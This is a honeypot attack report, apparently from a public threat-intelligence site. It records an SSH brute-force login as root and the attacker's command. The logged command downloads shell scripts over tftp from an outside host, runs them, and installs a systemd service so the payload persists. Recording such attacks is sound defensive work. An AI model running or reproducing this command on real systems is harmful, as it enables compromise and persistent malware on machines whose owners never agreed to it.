Attack Report for Observation

Header

Time

2024/11/22, 08:00:01 (GMT)

Transaction ID

9JH6JRB2ZUZ666E3

Service

ssh

Location

RU (Russia)

Attacker

147.45.47.117

Classification

Security execution

Harm Potential

High

Description

Command execution for security vulnerability

Content

147.45.47.117 client username 'root' and password 'root' entered
147.45.47.117 client command : 'cd /home && mkdir xbin3 && cd /home/xbin3 || cd /var/run || cd /mnt || cd /root || cd /; tftp 45.125.66.215 -c get tftp1.sh && chmod 777 tftp1.sh && sh tftp1.sh && tftp -r tftp2.sh -g 45.125.66.215 && chmod 777 tftp2.sh && sh tftp2.sh; echo -e "[Unit]
Description=My Service

[Service]
ExecStart=/bin/bash /home/xbin3/tftp1.sh
Restart=on-failure

[Install]
WantedBy=multi-user.target" > /etc/systemd/system/my2_service2.service && chmod 777 /etc/systemd/system/my2_service2.service && chmod +x /home/xbin3/tftp1.sh && systemctl daemon-reload && systemctl start my2_service2.service && systemctl enable my2_service2.service'

All observations are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate